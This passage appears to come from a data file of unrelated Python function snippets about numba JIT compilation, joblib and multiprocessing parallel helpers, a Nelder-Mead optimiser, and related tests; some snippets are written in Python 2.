numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n\n if gpu_present:\n dprint(1, \"using gpu context\")\n\n with dpctl.device_context(\"level0:gpu\"):\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.ngfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.ngfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n 
outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n except:\n self.ngfunc[atypes] = False\n dprint(1, \"Numba GPU ParallelAccelerator attempt failed.\")\n\n while try_again and count < 2:\n count += 1\n try_again = False\n if self.npfunc.get(atypes, True):\n try:\n ret = self.numba_pfunc(*args, **kwargs)\n self.npfunc[atypes] = True\n return ret\n except numba.core.errors.TypingError as te:\n tetxt = str(te)\n tesplit = tetxt.splitlines()\n for teline in tesplit:\n if \"Untyped global name\" in teline and \"ramba.StencilMetadata\" in teline:\n try_again = True\n # Name of global that is of type ramba.StencilMetadata\n tes = teline[21:].split()[0][:-2]\n outer_globals = self.func.__globals__\n outer_locals = {}\n etes = eval(tes, outer_globals, outer_locals)\n etes.compile() # Converts to a Numba StencilFunc\n outer_globals[tes] = etes.sfunc # Rewrite the global to the Numba StencilFunc\n self.numba_pfunc = numba.njit(parallel=True, **self.numba_args)(self.func)\n self.numba_func = numba.njit(**self.numba_args)(self.func)\n if not try_again:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n except:\n self.npfunc[atypes] = False\n dprint(1, \"Numba ParallelAccelerator attempt failed.\")\n\n if self.nfunc.get(atypes, True):\n try:\n ret = self.numba_func(*args, **kwargs)\n self.nfunc[atypes] = True\n dprint(3, \"Numba attempt succeeded.\")\n return ret\n except numba.core.errors.TypingError as te:\n print(\"Ramba TypingError:\", te, type(te))\n self.npfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n except:\n self.nfunc[atypes] = False\n dprint(1, \"Numba attempt failed.\")\n raise\n\n return self.func(*args, **kwargs)", "def jit(func):\n return func", "def conditional_jit(_func=None, **kwargs):\n if _func is None:\n return lambda fn: functools.wraps(fn)(maybe_numba_fn(fn, **kwargs))\n else:\n lazy_numba = maybe_numba_fn(_func, **kwargs)\n return functools.wraps(_func)(lazy_numba)", "def vectorize_par(\n f: Callable, inputs: Iterable,\n pool: Pool = None, processes=None, chunksize=1,\n nout=None, otypes: Union[Sequence[Type], Type] = None,\n use_starmap=True, meshgrid_input=True,\n) -> Tuple[Union[Mapping[Any, Any], np.ndarray, Sequence[Any]], ...]:\n if isinstance(inputs, dict):\n raise NotImplementedError()\n # s = dict(signature(f).parameters)\n # ks, ds = zip(*[(k, v.default) for k, v in s.items()])\n # inputs = [inputs[k] if k in inputs else arrayobj1d([d]) for k, d in zip(ks, ds)]\n\n if meshgrid_input:\n inputs = [\n inp if (isinstance(inp, np.ndarray) and type(inp[0]) is object)\n else (arrayobj1d(inp) if is_iter(inp)\n else arrayobj1d([inp]))\n for inp in inputs]\n shape0 = [len(inp) for inp in inputs]\n mesh_inputs = np.meshgrid(*inputs, indexing='ij') # type: Iterable[np.ndarray]\n else:\n inputs = [arrayobj1d([inp]) if not is_iter(inp) else inp for inp in inputs]\n shape0 = broadcast_shapes(*[npy(v).shape for v in inputs])\n mesh_inputs = [np.broadcast_to(v, shape0) for v in inputs]\n mesh_inputs = [m.flatten() for m in mesh_inputs]\n\n m = zip(*mesh_inputs)\n m = [m1 for m1 in m]\n\n if pool is 
None:\n pool = Pool(processes=processes) # type: PoolParallel\n\n # if processes == 0:\n # use_starmap = False\n\n if chunksize is None:\n # NOTE: this doesn't seem to work well, unlike chunksize=1.\n # Need further experiment.\n chunksize = np.max([\n int(np.floor(np.prod(shape0) / pool._processes)),\n 1\n ])\n\n if use_starmap:\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError from starmap! Trying again..')\n # Just try again - this seems to fix the issue\n try:\n outs = pool.starmap(f, m, chunksize=chunksize)\n except EOFError:\n print('EOFError again after trying again.. '\n 'Not trying again this time.')\n raise\n else:\n outs = pool.map(f, m, chunksize=chunksize)\n\n if nout is None:\n if otypes is not None and is_sequence(otypes):\n nout = len(otypes)\n else:\n try:\n nout = len(outs[0])\n except TypeError:\n nout = 1\n\n if otypes is None:\n otypes = [object] * nout\n elif not is_sequence(type(otypes)):\n otypes = [otypes] * nout\n\n # NOTE: deliberately keeping outs, outs1, and outs2 for debugging.\n # After confirming everything works well, rename all to \"outs\"\n # to save memory.\n # DEF: outs1[argout][i_input_flattened]\n if nout > 1:\n outs1 = zip(*outs)\n else:\n if use_starmap:\n outs1 = [outs]\n else:\n # Reverse the action of map() putting each output in a list\n outs1 = [[out1[0] for out1 in outs]]\n\n # --- outs2: reshape to inputs' dimensions\n # DEF: outs2[argout][i_input1, i_input2, ...]\n outs2 = [arrayobj1d(out).reshape(shape0) for out in outs1]\n\n # --- outs3: set to a correct otype\n # DEF: outs3[argout][i_input1, i_input2, ...]\n outs3 = [cell2mat(out, otype) if otype not in [object, object]\n else out\n for out, otype in zip(outs2, otypes)]\n return tuple(outs3)", "def default_numba_nopython_pipeline(state, pm):\n if state.func_ir is None:\n pm.add_pass(TranslateByteCode, \"analyzing bytecode\")\n pm.add_pass(FixupArgs, \"fix up args\")\n pm.add_pass(IRProcessing, \"processing IR\")\n pm.add_pass(WithLifting, \"Handle with contexts\")\n\n # this pass adds required logic to overload default implementation of\n # Numpy functions\n pm.add_pass(DPPLAddNumpyOverloadPass, \"dppl add typing template for Numpy functions\")\n\n # Add pass to ensure when users are allocating static\n # constant memory the size is a constant and can not\n # come from a closure variable\n pm.add_pass(DPPLConstantSizeStaticLocalMemoryPass, \"dppl constant size for static local memory\")\n\n # pre typing\n if not state.flags.no_rewrites:\n pm.add_pass(RewriteSemanticConstants, \"rewrite semantic constants\")\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n pm.add_pass(GenericRewrites, \"nopython rewrites\")\n\n pm.add_pass(InlineClosureLikes,\n \"inline calls to locally defined closures\")\n # convert any remaining closures into functions\n pm.add_pass(MakeFunctionToJitFunction,\n \"convert make_function into JIT functions\")\n # inline functions that have been determined as inlinable and rerun\n # branch pruning, this needs to be run after closures are inlined as\n # the IR repr of a closure masks call sites if an inlinable is called\n # inside a closure\n pm.add_pass(InlineInlinables, \"inline inlinable functions\")\n if not state.flags.no_rewrites:\n pm.add_pass(DeadBranchPrune, \"dead branch pruning\")\n\n pm.add_pass(FindLiterallyCalls, \"find literally calls\")\n pm.add_pass(LiteralUnroll, \"handles literal_unroll\")\n\n if state.flags.enable_ssa:\n pm.add_pass(ReconstructSSA, \"ssa\")\n # typing\n pm.add_pass(NopythonTypeInference, 
\"nopython frontend\")\n pm.add_pass(AnnotateTypes, \"annotate types\")\n\n # strip phis\n pm.add_pass(PreLowerStripPhis, \"remove phis nodes\")\n\n # optimisation\n pm.add_pass(InlineOverloads, \"inline overloaded functions\")", "def __call__(self, par_dict: dict) -> np.ndarray:", "def vectorize(func, processes=1, on_complete=None):\n if processes > 1:\n return __multiprocess_wrapper(func, processes, on_complete)\n else:\n return single_process_wrapper(func, on_complete)", "def job_as_parameter(f):\n f.job_as_parameter = True\n return f", "def _seed_numba(seed):\n np.random.seed(seed)", "def Optimise(LogLikelihood,par,func_args,fixed=None,type='max',method='NM',maxiter=10000, maxfun=10000, verbose=True):\n \n if fixed==None:\n var_par = np.copy(par)\n #otherwise construct the parameter vector from var_par and fixed_par_val\n else:\n par = np.array(par)\n fixed = np.array(fixed) #ensure fixed is a np array\n #assign parameters to normal param vector\n fixed_par = par[np.where(fixed==True)]\n var_par = par[np.where(fixed!=True)]\n \n #set the algorithm to use - CG and P not working (at least not well)\n add_kwords = {'verbose':verbose}\n if method == 'NM':\n Algorithm = NelderMead\n add_kwords = {'maxiter':maxiter, 'maxfun':maxfun,'verbose':verbose}\n elif method == 'CG':\n print \"warning: CG method didn't work properly during testing\"\n Algorithm = ConjugateGradient\n elif method == 'P':\n print \"warning: Powell algorithm didn't work properly during testing\"\n Algorithm = Powell\n else:\n print \"error: optimisation function not found\"\n return par\n \n #set the optimisation function to pos or neg for the fmin funcitons\n if type == 'max': OptFunc = NegFixedPar_func\n elif type == 'min': OptFunc = FixedPar_func\n else:\n print \"error: %s not a valid option\" % type\n return par\n \n #call the optimser with the appropriate function\n fitted_par = Algorithm(OptFunc, var_par, (LogLikelihood,func_args,fixed,fixed_par), \\\n **add_kwords)\n \n #now return the params in the correct order...\n if fixed==None:\n return_par = fitted_par\n else:\n return_par = np.copy(par) \n return_par[np.where(fixed!=True)] = fitted_par\n \n return return_par", "def _run_job(args):\n # Note that we do not set the seed of the random number generator because\n # we already modified the interaction matrix before calling this function\n # and it does not harm us when all sub processes have the same sequence of\n # random numbers.\n \n # create the object ...\n obj = LibraryBinaryNumeric(**args[0])\n # ... get the method to evaluate ...\n method = getattr(obj, args[1])\n # ... 
and evaluate it\n if len(args) > 2:\n return method(**args[2])\n else:\n return method()", "def progress_wrapper(user_defined_function: Callable, master_workers_queue: multiprocessing.Queue, index: int, chunk_size: int) -> Callable:\n ...", "def generate_numba_table_func(\n func: Callable[..., np.ndarray],\n nopython: bool,\n nogil: bool,\n parallel: bool,\n):\n numba_func = jit_user_function(func)\n if TYPE_CHECKING:\n import numba\n else:\n numba = import_optional_dependency(\"numba\")\n\n @numba.jit(nopython=nopython, nogil=nogil, parallel=parallel)\n def roll_table(\n values: np.ndarray,\n begin: np.ndarray,\n end: np.ndarray,\n minimum_periods: int,\n *args: Any,\n ):\n result = np.empty((len(begin), values.shape[1]))\n min_periods_mask = np.empty(result.shape)\n for i in numba.prange(len(result)):\n start = begin[i]\n stop = end[i]\n window = values[start:stop]\n count_nan = np.sum(np.isnan(window), axis=0)\n sub_result = numba_func(window, *args)\n nan_mask = len(window) - count_nan >= minimum_periods\n min_periods_mask[i, :] = nan_mask\n result[i, :] = sub_result\n result = np.where(min_periods_mask, result, np.nan)\n return result\n\n return roll_table", "def _dummy_jit(*args, **kwargs):\n\n def wrapper(f):\n return f\n\n def marker(*args, **kwargs):\n return marker\n\n if (\n len(args) > 0\n and (args[0] is marker or not callable(args[0]))\n or len(kwargs) > 0\n ):\n return wrapper\n elif len(args) == 0:\n return wrapper\n else:\n return args[0]", "def parfor(func, in_list, out_shape=None, n_jobs=-1, engine=\"joblib\",\n backend=\"threading\", func_args=[], func_kwargs={}):\n if n_jobs == -1:\n n_jobs = multiprocessing.cpu_count()\n n_jobs = n_jobs - 1\n\n if engine == \"joblib\":\n p = joblib.Parallel(n_jobs=n_jobs, backend=backend)\n d = joblib.delayed(func)\n d_l = []\n for in_element in in_list:\n d_l.append(d(in_element, *func_args, **func_kwargs))\n results = p(d_l)\n\n elif engine == \"dask\":\n def partial(func, *args, **keywords):\n def newfunc(in_arg):\n return func(in_arg, *args, **keywords)\n return newfunc\n p = partial(func, *func_args, **func_kwargs)\n d = [dask.delayed(p)(i) for i in in_list]\n if backend == \"multiprocessing\":\n results = dask.compute(*d, get=dask.multiprocessing.get,\n workers=n_jobs)\n elif backend == \"threading\":\n results = dask.compute(*d, get=dask.threaded.get,\n workers=n_jobs)\n else:\n raise ValueError(\"%s is not a backend for dask\" % backend)\n\n elif engine == \"serial\":\n results = []\n for in_element in in_list:\n results.append(func(in_element, *func_args, **func_kwargs))\n\n if out_shape is not None:\n return np.array(results).reshape(out_shape)\n else:\n return results", "def default_helper_c_code_args():\r\n\r\n return {\r\n \"c_prefix\": \"PyArray\",\r\n \"strides_mul\": 1,\r\n }", "def test_workon_with_parallel_backend(self):\n\n def foo(x):\n return [dict(name=\"result\", type=\"objective\", value=x * 2)]\n\n import joblib\n\n with joblib.parallel_backend(\"loky\"):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=5, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 5\n\n with joblib.parallel_backend(\"loky\", n_jobs=-1):\n experiment = workon(\n foo, space={\"x\": \"uniform(0, 10)\"}, max_trials=3, name=\"voici\"\n )\n\n assert experiment.name == \"voici\"\n assert len(experiment.fetch_trials()) == 3", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket 
import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, but never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def with_numpy(func):\r\n return func", "def test_default(self):\n varargs = ()\n kwargs = {}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 1)", "def do_partask(fn, jobs, _args=None, blocking=True,\n combfn=None, init=None,\n pass_idx=False,\n singleproc=False,\n manager=None,\n pass_queue=None,\n N=None):\n if singleproc or N == 1:\n moreargs = ()\n if pass_idx:\n moreargs += (0,)\n if pass_queue != None:\n moreargs += (pass_queue,)\n return fn(jobs, _args, *moreargs)\n\n if manager == None:\n print \"...creating new Manager...\"\n manager = multiprocessing.Manager()\n else:\n print \"...Received Your Manager, roger...\"\n queue = manager.Queue()\n\n p = multiprocessing.Process(target=spawn_jobs, args=(queue, fn, jobs, _args, pass_idx, pass_queue, N))\n p.start()\n\n num_jobs = len(jobs)\n if combfn == None:\n combfn = combfn_lst\n init = []\n elif combfn == 'dict':\n combfn = combfn_dict\n init = {}\n elif combfn == 'ignore':\n combfn = combfn_ignore\n init = True\n \n results = init\n while True:\n subresults = queue.get()\n if isinstance(subresults, POOL_CLOSED):\n return results\n results = combfn(results, subresults)\n return results", "def run_multiprocessing(args, function):\n vcf_fn = args.data_file\n num_processes = args.num_threads\n if num_processes > 1:\n # Split the VCF into chunks\n callset = allel.read_vcf(vcf_fn, fields=[\"variants/CHROM\", \"variants/POS\"])\n pos_list = 
callset[\"variants/POS\"]\n chroms = callset[\"variants/CHROM\"]\n assert np.all(chroms == chroms[0])\n chrom = str(chroms[0])\n\n def get_chromosome_chunks(lst, num_processes):\n length = len(lst)\n n = math.ceil(length / num_processes)\n chunks = list()\n for index, i in enumerate(range(0, length, n)):\n if index != num_processes - 1:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[i + n])),\n )\n )\n else:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[-1])),\n )\n )\n return chunks\n\n chunks = get_chromosome_chunks(pos_list, num_processes)\n chunks_iter = iter(chunks)\n reports = list()\n completed_files = list()\n with multiprocessing.Pool(processes=num_processes, maxtasksperchild=10) as pool:\n for index, row in enumerate(pool.map(function, chunks_iter)):\n reports.append(row)\n print(\n \"Processed Chunk {}: {} with {} sites added.\".format(\n index, chunks[index][2], row[\"num_sites\"]\n )\n )\n if row[\"num_sites\"] > 0:\n completed_files.append(index)\n else:\n os.remove(args.output_file + str(index) + \"-lock\")\n\n # Combine reports and print\n master_report = reports[0]\n for report in reports[1:]:\n for var_type, val in report.items():\n master_report[var_type] += val\n print(master_report)\n\n # Combine sampledata files\n filenames = completed_files\n all_samples = []\n for name in filenames:\n all_samples.append(tsinfer.load(args.output_file + str(name)))\n os.remove(args.output_file + str(name))\n\n samples = all_samples[0].copy(args.output_file)\n samples.append_sites(*all_samples[1:])\n samples.finalise()\n assert np.all(np.diff(samples.sites_position[:]) > 0)\n\n else:\n raise ValueError", "def joblib_batch_evaluator(\n func,\n arguments,\n *,\n n_cores=N_CORES,\n error_handling=\"continue\",\n unpack_symbol=None,\n):\n _check_inputs(func, arguments, n_cores, error_handling, unpack_symbol)\n n_cores = int(n_cores) if int(n_cores) >= 2 else 1\n\n reraise = error_handling == \"raise\"\n\n @unpack(symbol=unpack_symbol)\n @catch(default=\"__traceback__\", reraise=reraise)\n def internal_func(*args, **kwargs):\n return func(*args, **kwargs)\n\n if n_cores == 1:\n res = [internal_func(arg) for arg in arguments]\n else:\n res = Parallel(n_jobs=n_cores)(delayed(internal_func)(arg) for arg in arguments)\n\n return res", "def parallelizer(func, arg=False):\n if arg:\n func(arg)\n else:\n func()", "def fmin(func, x0, args=(), kw=dict(), xtol=1e-4, ftol=1e-4, maxiter=None, maxfun=None,\n full_output=0, disp=1, retall=0, callback=None, zdelt = 0.00025, nonzdelt = 0.05, \n holdfixed=None):\n # 2011-04-13 14:26 IJMC: Adding Keyword option\n # 2011-05-11 10:48 IJMC: Added the zdelt and nonzdelt options\n # 2011-05-30 15:36 IJMC: Added the holdfixed option\n\n def wrap_function(function, args, **kw):\n ncalls = [0]\n def function_wrapper(x):\n ncalls[0] += 1\n return function(x, *args, **kw)\n return ncalls, function_wrapper\n\n # Set up holdfixed arrays\n if holdfixed is not None:\n holdfixed = np.array(holdfixed)\n #x0[holdfixed] = x0[holdfixed]\n holdsome = True\n else:\n holdsome = False\n #holdfixed = np.zeros(params.size, dtype=bool)\n \n #if holdsome:\n # print \"holdfixed>>\", holdfixed\n\n fcalls, func = wrap_function(func, args, **kw)\n x0 = np.asfarray(x0).flatten()\n xoriginal = x0.copy()\n N = len(x0)\n rank = len(x0.shape)\n if not -1 < rank < 2:\n raise ValueError, \"Initial guess must be a scalar or rank-1 sequence.\"\n if maxiter is None:\n 
maxiter = N * 200\n if maxfun is None:\n maxfun = N * 200\n\n rho = 1; chi = 2; psi = 0.5; sigma = 0.5;\n one2np1 = range(1,N+1)\n\n if rank == 0:\n sim = np.zeros((N+1,), dtype=x0.dtype)\n else:\n sim = np.zeros((N+1,N), dtype=x0.dtype)\n fsim = np.zeros((N+1,), float)\n sim[0] = x0\n if retall:\n allvecs = [sim[0]]\n #print func.__name__\n #print x0\n fsim[0] = func(x0)\n for k in range(0,N):\n y = np.array(x0,copy=True)\n if y[k] != 0:\n y[k] = (1+nonzdelt)*y[k]\n else:\n y[k] = zdelt\n if holdsome and k in holdfixed:\n y[k] = xoriginal[k]\n sim[k+1] = y\n f = func(y)\n fsim[k+1] = f\n\n ind = np.argsort(fsim)\n fsim = np.take(fsim,ind,0)\n # sort so sim[0,:] has the lowest function value\n sim = np.take(sim,ind,0)\n\n iterations = 1\n\n while (fcalls[0] < maxfun and iterations < maxiter):\n ### IJC Edit to understand fmin!\n ##print 'xtol>> ' + str(max(np.ravel(abs(sim[1:]-sim[0])))) + ' > ' + str(xtol)\n ##print 'ftol>> ' + str(max(abs(fsim[0]-fsim[1:]))) + ' > ' + str(ftol)\n if (max(np.ravel(abs(sim[1:]-sim[0]))) <= xtol \\\n and max(abs(fsim[0]-fsim[1:])) <= ftol):\n break\n\n xbar = np.add.reduce(sim[:-1],0) / N\n xr = (1+rho)*xbar - rho*sim[-1]\n if holdsome:\n xr[holdfixed] = xoriginal[holdfixed]\n fxr = func(xr)\n doshrink = 0\n\n if fxr < fsim[0]:\n xe = (1+rho*chi)*xbar - rho*chi*sim[-1]\n if holdsome:\n xe[holdfixed] = xoriginal[holdfixed]\n fxe = func(xe)\n\n if fxe < fxr:\n sim[-1] = xe\n fsim[-1] = fxe\n else:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fsim[0] <= fxr\n if fxr < fsim[-2]:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fxr >= fsim[-2]\n # Perform contraction\n if fxr < fsim[-1]:\n xc = (1+psi*rho)*xbar - psi*rho*sim[-1]\n if holdsome:\n xc[holdfixed] = xoriginal[holdfixed]\n fxc = func(xc)\n\n if fxc <= fxr:\n sim[-1] = xc\n fsim[-1] = fxc\n else:\n doshrink=1\n else:\n # Perform an inside contraction\n xcc = (1-psi)*xbar + psi*sim[-1]\n if holdsome:\n xcc[holdfixed] = xoriginal[holdfixed]\n fxcc = func(xcc)\n\n if fxcc < fsim[-1]:\n sim[-1] = xcc\n fsim[-1] = fxcc\n else:\n doshrink = 1\n\n if doshrink:\n for j in one2np1:\n sim[j] = sim[0] + sigma*(sim[j] - sim[0])\n if holdsome:\n sim[j, holdfixed] = xoriginal[holdfixed]\n fsim[j] = func(sim[j])\n\n ind = np.argsort(fsim)\n sim = np.take(sim,ind,0)\n fsim = np.take(fsim,ind,0)\n if callback is not None:\n callback(sim[0])\n iterations += 1\n if retall:\n allvecs.append(sim[0])\n\n x = sim[0]\n fval = min(fsim)\n warnflag = 0\n\n if fcalls[0] >= maxfun:\n warnflag = 1\n if disp:\n print \"Warning: Maximum number of function evaluations has \"\\\n \"been exceeded.\"\n elif iterations >= maxiter:\n warnflag = 2\n if disp:\n print \"Warning: Maximum number of iterations has been exceeded\"\n else:\n if disp:\n print \"Optimization terminated successfully.\"\n print \" Current function value: %f\" % fval\n print \" Iterations: %d\" % iterations\n print \" Function evaluations: %d\" % fcalls[0]\n\n\n if full_output:\n retlist = x, fval, iterations, fcalls[0], warnflag\n if retall:\n retlist += (allvecs,)\n else:\n retlist = x\n if retall:\n retlist = (x, allvecs)\n\n return retlist", "def applymap_nb(a, map_func_nb, *args):\n out = np.full_like(a, np.nan, dtype=np.float_)\n\n for col in range(out.shape[1]):\n idxs = np.flatnonzero(~np.isnan(a[:, col]))\n for i in idxs:\n out[i, col] = map_func_nb(i, col, a[i, col], *args)\n return out", "def autovectorized(f):\r\n def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def _init_matrix(matrices, transform_func, default_val):\n if matrices is None:\n return default_val\n return transform_func(matrices)", "def _apply_defaults(func, args, kwargs):\n\n sig = signature(func)\n bound_arguments = sig.bind(*args, **kwargs)\n for param in sig.parameters.values():\n if param.name not in bound_arguments.arguments:\n bound_arguments.arguments[param.name] = param.default\n args = [bound_arguments.arguments[key] for key in sig.parameters.keys()]\n return args, {}", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def numba_check():\n numba = importlib.util.find_spec(\"numba\")\n return numba is not None", "def jit(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n def wrap_mindspore(func):\n if hash_args:\n hash_obj = _get_jit_hash(hash_args)\n else:\n hash_obj = int(time.time() * 1e9)\n\n @wraps(func)\n def staging_specialize(*args, **kwargs):\n if os.getenv(\"MS_JIT\") == '0':\n return func(*args, **kwargs)\n\n args, kwargs = _handle_func_args(func, *args, **kwargs)\n\n process_obj = None\n if args and not isinstance(args[0], PythonTensor) and hasattr(args[0], func.__name__):\n process_obj = args[0]\n # only the function or cell instance wrapped by shard will fall into this branch\n if _is_pynative_parallel() and func.__name__ == _PYNATIVE_PARALLEL_FUNC_NAME:\n process_obj = hash_args\n out = _MindsporeFunctionExecutor(func, hash_obj, input_signature, process_obj, jit_config)(*args, **kwargs)\n return out\n\n return staging_specialize\n\n if fn is not None:\n return wrap_mindspore(fn)\n return wrap_mindspore", "def parfor(fn, niters, fixed_args = (), ee = shared_exec_engine):\n assert isinstance(fn, Function), \\\n \"Can only run LLVM functions, not %s\" % type(fn)\n \n # in case fixed arguments aren't yet GenericValues, convert them\n fixed_args = tuple(gv_from_python(v, arg.type) \n for (v,arg) in \n zip(fixed_args, fn.args))\n iter_ranges, steps, shape = parse_iters(niters)\n result_lltype = return_type(fn) \n if result_lltype == ty_void:\n work_fn = parfor_wrapper(fn, steps)\n launch(work_fn, iter_ranges, fixed_args, ee)\n return \n else:\n assert is_llvm_float_type(result_lltype) or is_llvm_int_type(result_lltype)\n dtype = lltype_to_dtype(result_lltype)\n result_array = np.empty(shape = shape, dtype = dtype)\n fixed_args = (GenericValue.pointer(result_array.ctypes.data),) + fixed_args\n work_fn = parfor_wrapper(fn, steps, shape)\n n_given = len(fixed_args) + 2*len(steps)\n n_expected = len(work_fn.args)\n assert n_given == n_expected, \\\n \"Work function expects %d arguments but got %d\" % (n_expected, n_given)\n launch(work_fn, 
iter_ranges, fixed_args, ee)\n return result_array\n assert False, \"Collecting results not yet implemented\"", "def test_valid_n_jobs(n_jobs: Any) -> None:\n check_n_jobs(n_jobs)", "def test_increment_input_with_threads():\r\n a = [0]\r\n Parallel(n_jobs=2, backend=\"threading\")(\r\n delayed(increment_input)(a) for _ in range(5))\r\n nose.tools.assert_equal(a, [5])", "def __init__(self, defaults={}, data=None):\n\n super().__init__(\n defaults={**OptimizationParameters.parameters, **defaults}, data=data\n )", "def EM_numba(F,G,Y0,T=100,N=500000):\n\n Y0 = np.array(Y0)\n Y = np.zeros((Y0.shape[0],N+1))\n Y[:,0]=Y0\n dt = T/N\n t=np.linspace(0,T,N+1)\n\n for jt in range(0,N):\n Y[:,jt+1]=_EM_step(F,G,Y[:,jt],dt)\n\n return t,Y", "def __call__(self, *args, **kwargs):\n # TODO: figure out how to check if we are using a jobserver-supporting ninja,\n # the two split ninja packages make this very difficult right now\n parallel = should_set_parallel_jobs(jobserver_support=True) and kwargs.pop(\n \"parallel\", self.jobs > 1\n )\n\n if parallel:\n args = (\"-j{0}\".format(self.jobs),) + args\n jobs_env = kwargs.pop(\"jobs_env\", None)\n if jobs_env:\n # Caller wants us to set an environment variable to\n # control the parallelism.\n kwargs[\"extra_env\"] = {jobs_env: str(self.jobs)}\n\n return super(MakeExecutable, self).__call__(*args, **kwargs)", "def compute(args, fun, max_workers=6):\n print(\"\\nProcessing symbols in parallel\")\n ex = futures.ThreadPoolExecutor(max_workers=max_workers)\n ex.map(fun, args)", "def parallelize(func: callable, iterable, func_args: tuple=None, func_kwargs: dict=None, njobs=None, no_progress=False, **pbar_kw):\n if func_args is None:\n func_args = ()\n if func_kwargs is None:\n func_kwargs = {}\n njobs = get_njobs(njobs)\n\n if 'total' not in pbar_kw:\n try:\n n = len(iterable)\n pbar_kw['total'] = n\n except TypeError:\n pass\n\n delayed = joblib.delayed\n\n if no_progress or not HAS_TQDM:\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n else:\n with tqdm_joblib(**pbar_kw):\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n return res", "def parallel_calculation(self, serial_fun, init_config, **kwargs):\r\n burned_in_config = self.burn_in(init_config, **kwargs)\r\n num_processes = 1\r\n if platform in ('linux', 'linux2'):\r\n 